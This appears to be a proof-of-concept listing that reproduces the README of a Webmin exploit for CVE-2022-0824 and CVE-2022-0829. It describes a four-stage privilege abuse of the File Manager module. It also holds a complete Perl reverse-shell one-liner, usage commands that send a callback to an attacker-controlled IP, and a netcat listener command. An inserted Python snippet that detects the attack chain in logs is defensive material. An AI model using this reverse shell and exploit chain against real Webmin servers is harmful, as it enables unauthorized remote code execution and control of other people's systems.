PoC details: 19005a3e95be6d57c5d6b935dc4bfd4615e2b9d4

Source
Related vulnerability
Title: Webmin access control error vulnerability (CVE-2022-0824)
Description: Webmin is a set of web-based system administration tools for Unix-like operating systems from the Webmin community. Webmin versions before 1.990 contain a security vulnerability caused by improper access control in the software; an attacker can exploit it to achieve remote code execution.
Description
CVE-2022-0824, CVE-2022-0829, File Manager privilege exploit
Introduction
# WebminRCE-exploit
CVE-2022-0824, CVE-2022-0829 - File Manager privilege exploit

Vulnerable application to test this PoC can be found [here](https://hub.docker.com/r/gokul2/cve-2022-0824) as a docker image.

Prerequisites:
- Python3
- Requests module

<h2>Description</h2>
<h3>Vulnerability</h3>
Improper Access Control to Remote Code Execution.
Safe users (unprivileged users) can access the File Manager module, which should be restricted by default.

<h3>Exploit Payload</h3>
Use the improper access control vulnerability to upload a CGI file onto the Webmin server.
<h4>Stage 1 (Authentication)</h4>
Authenticate and log in to the server with a safe/less privileged user.
<h4>Stage 2 (Download file into server)</h4>
Make use of the vulnerable File Manager module (/file-manager/http_download.cgi) to download a Perl script onto the server.
Perl script used to obtain a reverse shell:

```perl
perl -e 'use Socket;$i="0.0.0.0";$p=1111;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```
<h4>Stage 3 (Modify permission)</h4>
Add executable permission to the file (/file-manager/chmod.cgi).

<h4>Stage 4 (Execute Command)</h4>
Simply call the uploaded file to execute the reverse shell script inside it.
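From a detection standpoint, the chain in Stages 2 and 3 leaves a distinctive trace: an account that is not an administrator reaches /file-manager/http_download.cgi and then /file-manager/chmod.cgi. The script below is an added example (not part of this PoC or of Webmin) that flags that sequence in Webmin access-log lines; it assumes a common-log style line with the username in the third field, as Webmin's miniserv.log writes it, and the log lines and privileged-user list are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample log lines (not captured from a real host). The "usr"
# account walks the exploit chain from the README; "root" is normal admin use.
SAMPLE_LOG = """\
192.0.2.10 - usr [11/Mar/2022:10:00:01 +0000] "POST /session_login.cgi HTTP/1.1" 302 0
192.0.2.10 - usr [11/Mar/2022:10:00:05 +0000] "POST /file-manager/http_download.cgi?module=filemin HTTP/1.1" 200 512
192.0.2.10 - usr [11/Mar/2022:10:00:09 +0000] "POST /file-manager/chmod.cgi?module=filemin HTTP/1.1" 200 210
192.0.2.10 - usr [11/Mar/2022:10:00:12 +0000] "GET /rev.cgi HTTP/1.1" 200 0
192.0.2.11 - root [11/Mar/2022:10:05:00 +0000] "GET /file-manager/index.cgi HTTP/1.1" 200 4096
"""

# Common-log style: ip ident user [timestamp] "METHOD path PROTO" status
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d+)'
)

DOWNLOAD = "/file-manager/http_download.cgi"
CHMOD = "/file-manager/chmod.cgi"


def parse_line(line):
    """Return a dict of fields for one log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string
    return rec


def find_suspicious_chains(log_text, privileged_users=("root",)):
    """Map each non-privileged user to the File Manager endpoints they hit,
    keeping only users who called http_download.cgi and chmod.cgi after it.
    The privileged-user list is an assumed, site-specific allowlist."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["user"] in privileged_users:
            continue
        if rec["path"] in (DOWNLOAD, CHMOD):
            hits[rec["user"]].append(rec["path"])
    flagged = {}
    for user, paths in hits.items():
        if DOWNLOAD in paths and CHMOD in paths[paths.index(DOWNLOAD):]:
            flagged[user] = paths
    return flagged
```

Any File Manager access by a user who should not have the module at all is worth alerting on by itself; the ordered download-then-chmod pair is the higher-confidence signal.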

<h2>Usage directions</h2>

```
$ python3 cve-2022-0824.py --help

usage: cve-2022-0824.py [-h] --host HOST --user USER --password PASSWORD
                        --Python_server PYTHON_SERVER --callback_url
                        CALLBACK_URL [--proxy PROXY]

optional arguments:
  -h, --help            show this help message and exit
  --host HOST           Host url(complete)
  --user USER           Username
  --password PASSWORD   Password
  --Python_server PYTHON_SERVER
                        Python httpServer with port
  --callback_url CALLBACK_URL
                        Callback ip and port
  --proxy PROXY         Proxy details

```

<h2>Usage example</h2>

```
$ python3 cve-2022-0824.py --host [Target_url] --user [Username] --password [Password] --Python_server [Filehosting Server Information] --callback_url [<ip>:<port> for reverse shell connections] --proxy [Proxy server details - optional]
```

```
$ python3 cve-2022-0824.py --host http://localhost:10000 --user usr --password usr --Python_server 192.168.43.228:9999 --callback_url 192.168.43.228:1234 --proxy http://127.0.0.1:8080
```

Username and Password are for safe users (non-privileged).
Set up a listener before running the script to receive the reverse shell connection:
```
$ nc -lvp <port>
```
Thanks to [@faisalfs10x](https://github.com/faisalfs10x)  for the exploit.
File snapshot

```
[4.0K] /data/pocs/19005a3e95be6d57c5d6b935dc4bfd4615e2b9d4
├── [3.6K] cve-2022-0824.py
└── [2.7K] README.md
0 directories, 2 files
```